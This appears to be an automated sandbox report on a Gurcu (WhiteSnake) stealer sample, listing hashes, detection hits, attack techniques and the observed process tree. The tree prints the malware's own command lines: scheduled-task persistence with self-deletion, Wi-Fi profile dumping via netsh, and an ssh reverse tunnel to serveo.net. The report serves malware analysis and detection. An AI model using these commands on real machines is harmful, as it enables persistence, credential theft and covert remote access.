gurcu | 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

Analysis

max time kernel
148s
max time network
155s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
08-09-2023 08:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a43b860d290321de53ed6deb5cae95af.exe
Size

53.4MB
MD5

a43b860d290321de53ed6deb5cae95af
SHA1

62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256

6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512

535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5
SSDEEP

6144:wGWM/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccH19bqjWVHQDcXeUa:cmRatpvnzZjDv7oj19yTuj+H9XRa

Score

10^/10

gurcu collection discovery spyware stealer

Malware Config

Signatures

Detect Gurcu Stealer V3 payload 9 IoCs

resource	yara_rule
behavioral1/memory/2576-0-0x0000000000210000-0x0000000000272000-memory.dmp	family_gurcu_v3
behavioral1/memory/2576-2-0x000000001B2E0000-0x000000001B360000-memory.dmp	family_gurcu_v3
behavioral1/files/0x00040000000130e5-8.dat	family_gurcu_v3
behavioral1/files/0x00040000000130e5-7.dat	family_gurcu_v3
behavioral1/memory/2616-10-0x0000000000CD0000-0x0000000000D32000-memory.dmp	family_gurcu_v3
behavioral1/memory/2616-11-0x0000000000470000-0x00000000004F0000-memory.dmp	family_gurcu_v3
behavioral1/memory/2616-127-0x0000000000470000-0x00000000004F0000-memory.dmp	family_gurcu_v3
behavioral1/files/0x00040000000130e5-189.dat	family_gurcu_v3
behavioral1/memory/2352-191-0x000000001B2A0000-0x000000001B320000-memory.dmp	family_gurcu_v3

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Deletes itself 1 IoCs

pid	Process
1256	cmd.exe

Executes dropped EXE 4 IoCs

pid	Process
2616	a43b860d290321de53ed6deb5cae95af.exe
1844	ssh.exe
2352	a43b860d290321de53ed6deb5cae95af.exe
2404	ssh.exe

Loads dropped DLL 2 IoCs

pid	Process
1844	ssh.exe
2404	ssh.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2500	schtasks.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	a43b860d290321de53ed6deb5cae95af.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	a43b860d290321de53ed6deb5cae95af.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	a43b860d290321de53ed6deb5cae95af.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	a43b860d290321de53ed6deb5cae95af.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	a43b860d290321de53ed6deb5cae95af.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	a43b860d290321de53ed6deb5cae95af.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	a43b860d290321de53ed6deb5cae95af.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	a43b860d290321de53ed6deb5cae95af.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2712	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2616	a43b860d290321de53ed6deb5cae95af.exe
2616	a43b860d290321de53ed6deb5cae95af.exe
2352	a43b860d290321de53ed6deb5cae95af.exe
2352	a43b860d290321de53ed6deb5cae95af.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2576	a43b860d290321de53ed6deb5cae95af.exe
Token: SeDebugPrivilege	2616	a43b860d290321de53ed6deb5cae95af.exe
Token: SeDebugPrivilege	2352	a43b860d290321de53ed6deb5cae95af.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2576 wrote to memory of 1256	2576	a43b860d290321de53ed6deb5cae95af.exe	28
PID 2576 wrote to memory of 1256	2576	a43b860d290321de53ed6deb5cae95af.exe	28
PID 2576 wrote to memory of 1256	2576	a43b860d290321de53ed6deb5cae95af.exe	28
PID 1256 wrote to memory of 2620	1256	cmd.exe	30
PID 1256 wrote to memory of 2620	1256	cmd.exe	30
PID 1256 wrote to memory of 2620	1256	cmd.exe	30
PID 1256 wrote to memory of 2712	1256	cmd.exe	31
PID 1256 wrote to memory of 2712	1256	cmd.exe	31
PID 1256 wrote to memory of 2712	1256	cmd.exe	31
PID 1256 wrote to memory of 2500	1256	cmd.exe	32
PID 1256 wrote to memory of 2500	1256	cmd.exe	32
PID 1256 wrote to memory of 2500	1256	cmd.exe	32
PID 1256 wrote to memory of 2616	1256	cmd.exe	33
PID 1256 wrote to memory of 2616	1256	cmd.exe	33
PID 1256 wrote to memory of 2616	1256	cmd.exe	33
PID 2616 wrote to memory of 2548	2616	a43b860d290321de53ed6deb5cae95af.exe	34
PID 2616 wrote to memory of 2548	2616	a43b860d290321de53ed6deb5cae95af.exe	34
PID 2616 wrote to memory of 2548	2616	a43b860d290321de53ed6deb5cae95af.exe	34
PID 2548 wrote to memory of 2448	2548	cmd.exe	36
PID 2548 wrote to memory of 2448	2548	cmd.exe	36
PID 2548 wrote to memory of 2448	2548	cmd.exe	36
PID 2548 wrote to memory of 2960	2548	cmd.exe	37
PID 2548 wrote to memory of 2960	2548	cmd.exe	37
PID 2548 wrote to memory of 2960	2548	cmd.exe	37
PID 2548 wrote to memory of 2192	2548	cmd.exe	38
PID 2548 wrote to memory of 2192	2548	cmd.exe	38
PID 2548 wrote to memory of 2192	2548	cmd.exe	38
PID 2616 wrote to memory of 312	2616	a43b860d290321de53ed6deb5cae95af.exe	39
PID 2616 wrote to memory of 312	2616	a43b860d290321de53ed6deb5cae95af.exe	39
PID 2616 wrote to memory of 312	2616	a43b860d290321de53ed6deb5cae95af.exe	39
PID 312 wrote to memory of 1952	312	cmd.exe	41
PID 312 wrote to memory of 1952	312	cmd.exe	41
PID 312 wrote to memory of 1952	312	cmd.exe	41
PID 312 wrote to memory of 388	312	cmd.exe	42
PID 312 wrote to memory of 388	312	cmd.exe	42
PID 312 wrote to memory of 388	312	cmd.exe	42
PID 312 wrote to memory of 1716	312	cmd.exe	43
PID 312 wrote to memory of 1716	312	cmd.exe	43
PID 312 wrote to memory of 1716	312	cmd.exe	43
PID 2616 wrote to memory of 1844	2616	a43b860d290321de53ed6deb5cae95af.exe	44
PID 2616 wrote to memory of 1844	2616	a43b860d290321de53ed6deb5cae95af.exe	44
PID 2616 wrote to memory of 1844	2616	a43b860d290321de53ed6deb5cae95af.exe	44
PID 2616 wrote to memory of 1844	2616	a43b860d290321de53ed6deb5cae95af.exe	44
PID 2788 wrote to memory of 2352	2788	taskeng.exe	50
PID 2788 wrote to memory of 2352	2788	taskeng.exe	50
PID 2788 wrote to memory of 2352	2788	taskeng.exe	50
PID 2352 wrote to memory of 2884	2352	a43b860d290321de53ed6deb5cae95af.exe	51
PID 2352 wrote to memory of 2884	2352	a43b860d290321de53ed6deb5cae95af.exe	51
PID 2352 wrote to memory of 2884	2352	a43b860d290321de53ed6deb5cae95af.exe	51
PID 2884 wrote to memory of 2264	2884	cmd.exe	53
PID 2884 wrote to memory of 2264	2884	cmd.exe	53
PID 2884 wrote to memory of 2264	2884	cmd.exe	53
PID 2884 wrote to memory of 1256	2884	cmd.exe	55
PID 2884 wrote to memory of 1256	2884	cmd.exe	55
PID 2884 wrote to memory of 1256	2884	cmd.exe	55
PID 2884 wrote to memory of 2600	2884	cmd.exe	54
PID 2884 wrote to memory of 2600	2884	cmd.exe	54
PID 2884 wrote to memory of 2600	2884	cmd.exe	54
PID 2352 wrote to memory of 2004	2352	a43b860d290321de53ed6deb5cae95af.exe	56
PID 2352 wrote to memory of 2004	2352	a43b860d290321de53ed6deb5cae95af.exe	56
PID 2352 wrote to memory of 2004	2352	a43b860d290321de53ed6deb5cae95af.exe	56
PID 2004 wrote to memory of 1968	2004	cmd.exe	58
PID 2004 wrote to memory of 1968	2004	cmd.exe	58
PID 2004 wrote to memory of 1968	2004	cmd.exe	58

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a43b860d290321de53ed6deb5cae95af.exe

C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe
"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2620
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2712
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2500
- - C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
    "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2548
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2448
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:2960
    - - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:2192
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:312
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1952
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        
        PID:388
    - - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        5⤵
        
        PID:1716
  - - C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
      "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8661 serveo.net
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1844

C:\Windows\system32\taskeng.exe
taskeng.exe {14259D2D-B483-426D-98C8-CF75E3611BDE} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
  C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - outlook_office_path
  - outlook_win_path
  PID:2352
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2264
  - - C:\Windows\system32\findstr.exe
